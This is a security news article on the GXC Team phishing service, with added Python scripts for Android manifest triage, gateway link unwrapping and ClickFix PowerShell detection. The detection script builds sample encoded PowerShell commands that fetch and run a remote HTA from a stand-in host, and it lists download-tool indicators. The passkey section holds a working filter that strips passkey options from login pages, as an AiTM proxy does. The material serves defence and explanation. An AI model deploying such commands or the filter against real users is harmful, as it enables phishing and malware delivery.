New Cybercrime Service Uses AI to Bundle Phishing Kits with Malicious Android Apps
A Spanish-speaking cybercrime group known as GXC Team has been observed bundling phishing kits with malicious Android applications, taking malware-as-a-service (MaaS) offerings to a new level.
Group-IB, the Singapore-headquartered cybersecurity firm that has been tracking the group since January 2023, described the service as an "advanced AI-driven phishing-as-a-service system" capable of targeting users of more than 36 Spanish banks, government bodies, and 30 organizations worldwide.
The phishing kit is priced between $150 and $900 a month, while the bundle of phishing kit plus Android malware is sold on a subscription basis for about $500 a month.
Targets of the operation include customers of Spanish financial institutions, as well as tax and government services, e-commerce platforms, banks, and cryptocurrency exchanges in the United States, the United Kingdom, Slovakia, and Brazil. To date, 288 phishing domains linked to the activity have been identified.
The group's portfolio also covers the sale of stolen banking credentials and custom coding-for-hire schemes for other criminal groups targeting financial institutions, banks, and cryptocurrency businesses.
"In contrast to conventional phishing developers, the GXC Team coupled phishing kits with SMS OTP piracy malware, pioneering a new variation in a typical phishing attack narrative," security researchers Anton Ushakov and Martijn van den Berk said in a report published Thursday.
Notably, rather than using the fake page directly to harvest credentials, the threat actors urge victims to download an Android banking app, ostensibly to protect them from phishing. The pages are distributed via smishing and other methods.

Once installed, the app asks to be set as the default SMS app, which lets it intercept one-time passwords and other messages and forward them to a Telegram bot controlled by the threat actors.
"In the subsequent phase, the application launches an authentic banking website in a WebView for users to interact with normally," the researchers said. "Following that, whenever the assailant triggers the OTP prompt, the Android malware surreptitiously receives and forwards SMS messages containing OTP codes to the Telegram chat managed by the threat actor."
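The default-SMS-app behaviour described above leaves a recognisable footprint in the app's manifest: only the default SMS handler receives the SMS_DELIVER broadcast, so an app that wants the role declares a receiver for it guarded by the BROADCAST_SMS permission, alongside the usual SMS permissions and INTERNET for exfiltration. The following static triage script is an added example written for this article, not code from Group-IB or from the GXC Team samples; the manifest it inspects is constructed to match the shape described in the text, and the package name and class names are assumptions.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # ElementTree form of the android: prefix

# Constructed manifest in the shape the article describes (not a real sample):
# a "bank security" app that asks to become the default SMS handler and has
# network access to forward what it intercepts. Package/class names are made up.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.fakebank">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application android:label="Bank Security">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name=".SmsReceiver"
              android:permission="android.permission.BROADCAST_SMS">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_DELIVER"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

SMS_PERMS = {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS",
             "android.permission.SEND_SMS"}


def _has_action(elem, action):
    return any(a.get(A + "name") == action for a in elem.iter("action"))


def analyse_manifest(xml_text: str) -> dict:
    """Static triage of a decoded AndroidManifest.xml for the default-SMS-app pattern."""
    root = ET.fromstring(xml_text)
    perms = {p.get(A + "name") for p in root.iter("uses-permission")}
    # Only the default SMS app receives SMS_DELIVER; a receiver for it guarded by
    # BROADCAST_SMS is the core of the contract an app must meet to claim that role.
    sms_deliver = any(
        r.get(A + "permission") == "android.permission.BROADCAST_SMS"
        and _has_action(r, "android.provider.Telephony.SMS_DELIVER")
        for r in root.iter("receiver"))
    sms_perms = sorted(perms & SMS_PERMS)
    internet = "android.permission.INTERNET" in perms
    findings = []
    if sms_deliver:
        findings.append("SMS_DELIVER receiver: app can claim the default SMS handler role")
    if sms_perms:
        findings.append("SMS permissions requested: " + ", ".join(sms_perms))
    if internet:
        findings.append("INTERNET permission: intercepted messages can be exfiltrated")
    if sms_deliver and internet:
        verdict = "suspicious"
    elif sms_deliver or sms_perms:
        verdict = "review"
    else:
        verdict = "no SMS access"
    return {"package": root.get("package"), "default_sms_candidate": sms_deliver,
            "sms_permissions": sms_perms, "internet": internet,
            "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for line in analyse_manifest(SAMPLE_MANIFEST)["findings"]:
        print(line)
```

The manifest inside an APK is binary XML, so decode it first (for example with `apktool d`) and feed the resulting text to `analyse_manifest`. Genuine messaging apps declare the same receiver, so the signal is the combination: a banking-branded app that claims the SMS handler role is the anomaly, not the role itself.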
One of the services advertised by the threat actor on a dedicated Telegram channel is an AI-powered voice-calling tool that lets customers place voice calls to potential targets based on a series of prompts fed directly from the phishing kit.
These calls typically impersonate a bank and instruct users to hand over their two-factor authentication (2FA) codes, install malicious apps, or perform other arbitrary actions.
"This uncomplicated yet practical technique advances the scheme, rendering it even more believable to the targets, and demonstrates the rapid and straightforward integration of AI tools by criminals in their stratagems, converting traditional fraud tactics to more modern, sophisticated ploys," the researchers said.
In a recent report, Google-owned Mandiant said AI-driven voice cloning can imitate human speech with "incredible precision," enabling more realistic-sounding phishing (vishing) that supports initial access, privilege escalation, and lateral movement.
"Criminals can mimic executives, colleagues, or even IT support staff to deceive victims into exposing confidential data, granting remote system access, or transferring funds," the threat intelligence firm said.
"The inherent trust associated with a familiar voice can be exploited to manipulate victims into taking actions they would not normally take, such as clicking on malicious links, downloading malware, or divulging sensitive data."
Phishing kits with adversary-in-the-middle (AiTM) capabilities have grown in popularity because they lower the technical bar for running large-scale phishing campaigns.
In a recent write-up, security researcher mr.d0x showed that attackers can abuse progressive web apps (PWAs) to build convincing login screens for phishing by manipulating the user interface to display a fake URL bar.
Such AiTM phishing kits can also be used to compromise accounts protected by passkeys on various online platforms by means of an authentication method redaction attack, which takes advantage of the fact that these services still present a less secure authentication method as a fallback even when passkeys are configured. The passkey itself is not broken: a WebAuthn assertion is bound to the origin the browser is actually talking to, so a proxy cannot relay it; the attack instead steers the victim to the fallback method, whose password and OTP the proxy can relay.
"Given that the AitM has the ability to alter the view shown to the user by adjusting HTML, CSS and images or JavaScript in the login page, as it is transmitted to the end user, they can manage the authentication process and eliminate all mentions of passkey authentication," cybersecurity firm eSentire said.
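To make the redaction concrete, here is an added example (not eSentire's code or any kit's) of both sides of the problem: a filter standing in for the proxy-side rewrite that strips every passkey element from a login page as it passes through, and the relying-party rule that defeats it, namely deciding server-side which methods an account may use regardless of what the (possibly rewritten) page offered. The `data-auth-method="passkey"` marker and the sample page are assumptions; a real kit matches the target site's own selectors.

```python
from html.parser import HTMLParser

VOID_TAGS = {"input", "br", "img", "meta", "link", "hr", "source"}


class PasskeyRedactor(HTMLParser):
    """Re-emits HTML unchanged except that any element carrying the (assumed)
    marker data-auth-method="passkey" is dropped together with its subtree.
    This stands in for the in-transit rewrite an AiTM proxy performs."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self.skip = 0  # nesting depth while inside a dropped subtree

    def handle_starttag(self, tag, attrs):
        if self.skip:
            if tag not in VOID_TAGS:      # void tags never get an end tag
                self.skip += 1
            return
        if ("data-auth-method", "passkey") in attrs:
            if tag not in VOID_TAGS:
                self.skip = 1
            return
        self.out.append(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):
        if self.skip or ("data-auth-method", "passkey") in attrs:
            return
        self.out.append(self.get_starttag_text())

    def handle_endtag(self, tag):
        if self.skip:
            self.skip -= 1
            return
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip:
            self.out.append(data)

    def handle_entityref(self, name):
        if not self.skip:
            self.out.append("&%s;" % name)

    def handle_charref(self, name):
        if not self.skip:
            self.out.append("&#%s;" % name)

    def handle_comment(self, data):
        if not self.skip:
            self.out.append("<!--%s-->" % data)

    def handle_decl(self, decl):
        self.out.append("<!%s>" % decl)


def redact_passkey_ui(html: str) -> str:
    """What the victim sees after the proxy has removed the passkey option."""
    p = PasskeyRedactor()
    p.feed(html)
    p.close()
    return "".join(p.out)


def methods_server_accepts(passkey_enrolled: bool, passkey_only_policy: bool) -> frozenset:
    """Relying-party decision made independently of the page the client rendered.
    With passkey_only_policy the weaker fallback is refused for accounts that have
    a passkey, which removes the path the redaction attack depends on."""
    if passkey_enrolled and passkey_only_policy:
        return frozenset({"passkey"})
    if passkey_enrolled:
        return frozenset({"passkey", "password+otp"})   # fallback still offered
    return frozenset({"password+otp"})


# Constructed login page (not from any real site).
LOGIN_PAGE = """<!doctype html>
<form id="login" method="post" action="/session">
  <label>Email <input name="email" type="email"></label>
  <label>Password <input name="password" type="password"></label>
  <button type="submit">Sign in</button>
</form>
<div data-auth-method="passkey" id="passkey-box">
  <p>Sign in faster with a <b>passkey</b></p>
  <button onclick="startPasskeyLogin()">Use passkey</button>
</div>
<p>Need help? Contact support &amp; we will call you.</p>
"""

if __name__ == "__main__":
    print(redact_passkey_ui(LOGIN_PAGE))
```

The filter is deliberately an identity transform apart from the dropped subtree, which is what makes the rewritten page indistinguishable to the victim. The policy function is where the fix lives: whether the server accepts `password+otp` for a passkey-enrolled account is not something the client can negotiate, and `methods_server_accepts(True, False)` is exactly the fallback the article says these services still present.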
The disclosure comes amid a recent rise in phishing campaigns that use URLs already rewritten by security tools such as Secure Email Gateways (SEGs), in an attempt to mask phishing links behind a trusted-looking domain and evade detection, according to reports from Barracuda Networks and Cofense.
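Because a pre-wrapped link shows only the gateway's domain, an analyst or detection pipeline needs to peel the wrapper to see where it really goes. The following unwrapper is an added example written for this article, not code from Barracuda or Cofense; it handles the two wrapper formats named in the code (Microsoft Safe Links and Proofpoint URL Defense v2, as those formats are publicly documented) and the sample links are constructed, with the hostnames and parameter values made up.

```python
import re
from urllib.parse import urlsplit, parse_qs, quote


def _decode_proofpoint_v2(u: str) -> str:
    # URL Defense v2 stores the target in the `u` parameter with '/' turned into
    # '_' and any other reserved byte turned into '-XX' (hex). Restore '/' first
    # so a literal underscore (encoded as -5F) is not clobbered by the first step.
    s = u.replace("_", "/")
    return re.sub(r"-([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)


def unwrap_seg_url(url: str, max_layers: int = 5):
    """Peel known SEG wrappers until a non-wrapped URL is reached.

    Returns (final_url, layers_removed). A positive layer count on a link that
    arrived from outside the organisation is itself worth flagging: the sender
    had no reason to ship a link already rewritten by someone else's gateway."""
    layers = 0
    while layers < max_layers:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        qs = parse_qs(parts.query)
        if host.endswith("safelinks.protection.outlook.com") and "url" in qs:
            url = qs["url"][0]                    # parse_qs already percent-decoded it
        elif host == "urldefense.proofpoint.com" and parts.path.startswith("/v2/url") and "u" in qs:
            url = _decode_proofpoint_v2(qs["u"][0])
        else:
            break
        layers += 1
    return url, layers


# Constructed sample: a phishing URL wrapped once by Proofpoint and then again by
# Safe Links, as happens when a lure passes through two gateways. Not real data.
FINAL_URL = "https://login.example-bank.test/verify?id=42"
PROOFPOINT_URL = ("https://urldefense.proofpoint.com/v2/url?u="
                  "https-3A__login.example-2Dbank.test_verify-3Fid-3D42&d=DwMFaQ&e=")
SAFELINKS_URL = ("https://nam02.safelinks.protection.outlook.com/?url="
                 + quote(PROOFPOINT_URL, safe="") + "&data=05%7C01%7C&reserved=0")

if __name__ == "__main__":
    target, n = unwrap_seg_url(SAFELINKS_URL)
    print("%d wrapper(s) removed -> %s" % (n, target))
```

Keep `max_layers` small: a wrapper that points back at another wrapper is either a gateway quirk or a deliberate loop, and either way the loop guard keeps the unwrapper from spinning. Other rewriters (Proofpoint's v3 format, Mimecast, and so on) follow different encodings and would each need their own branch.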
Social engineering attacks have also been observed using an unconventional tactic in which users are lured to seemingly legitimate websites and then instructed to manually copy, paste, and run obfuscated code in a PowerShell terminal under the pretext of fixing a problem with viewing content in the browser.
Details of this malware delivery method have previously been documented by ReliaQuest and Proofpoint. McAfee Labs is tracking the activity under the name ClickFix.
“By inserting Base64-encoded scripts within seemingly authentic error prompts, attackers trick users into carrying out a sequence of actions that lead to the execution of malicious PowerShell commands,” researchers Yashvi Shah and Vignesh Dhatchanamoorthy explained.
“These commands commonly download and run payloads, such as HTA files, from remote servers, subsequently deploying malware like DarkGate and Lumma Stealer.”
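The defensive counterpart to the technique described above is to decode what the pasted command actually runs, since the Base64 layer hides the `mshta`/HTA download from plain string matching on process-creation logs. The script below is an added example written for this article, not McAfee's, ReliaQuest's or Proofpoint's code; it decodes both the `-EncodedCommand` form (always UTF-16LE) and an inline `FromBase64String(...)` form, then scores the decoded text. The command lines and the payload URL are constructed for the example.

```python
import base64
import re

# Constructed command lines of the shape described in the article (not real samples).
PAYLOAD = "mshta https://cdn.example.test/update.hta"
B64_UTF16 = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
B64_UTF8 = base64.b64encode(PAYLOAD.encode("utf-8")).decode()
SAMPLES = [
    "powershell.exe -w hidden -ep bypass -enc " + B64_UTF16,
    "powershell -NoP -C \"iex([Text.Encoding]::UTF8.GetString("
    "[Convert]::FromBase64String('" + B64_UTF8 + "')))\"",
    "powershell -NoProfile -Command Get-ChildItem C:\\Users",   # benign control
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
INLINE_B64 = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
INDICATORS = ("mshta", "http", ".hta", "iex", "invoke-expression",
              "downloadstring", "downloadfile", "bitsadmin", "certutil")


def _to_text(raw: bytes) -> str:
    # -EncodedCommand payloads are UTF-16LE; inline FromBase64String payloads are
    # usually UTF-8. Detect UTF-16LE ASCII by the NUL bytes in odd positions.
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def decode_embedded(cmdline: str) -> list:
    """Return every Base64 payload embedded in a PowerShell command line, decoded."""
    decoded = []
    for pat in (ENC_FLAG, INLINE_B64):
        for m in pat.finditer(cmdline):
            try:
                decoded.append(_to_text(base64.b64decode(m.group(1), validate=True)))
            except ValueError:   # not actually Base64, e.g. a long option value
                continue
    return decoded


def triage(cmdline: str) -> dict:
    """Score one process-creation command line for the ClickFix pattern."""
    decoded = decode_embedded(cmdline)
    haystack = (cmdline + " " + " ".join(decoded)).lower()
    hits = [i for i in INDICATORS if i in haystack]
    if HIDDEN_WINDOW.search(cmdline):
        hits.append("hidden-window")
    return {"decoded": decoded, "indicators": hits,
            "suspicious": bool(decoded) and bool(hits)}


if __name__ == "__main__":
    for line in SAMPLES:
        r = triage(line)
        print(r["suspicious"], r["indicators"], r["decoded"])
```

Feed it the CommandLine field from Sysmon event 1 or Windows event 4688; for ClickFix lures the parent is typically explorer.exe (the Run dialog) rather than a script host, which is a second signal worth pairing with the decoded content. The `suspicious` verdict requires both an embedded payload and an indicator, so an encoded but harmless admin command does not trip it on its own.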

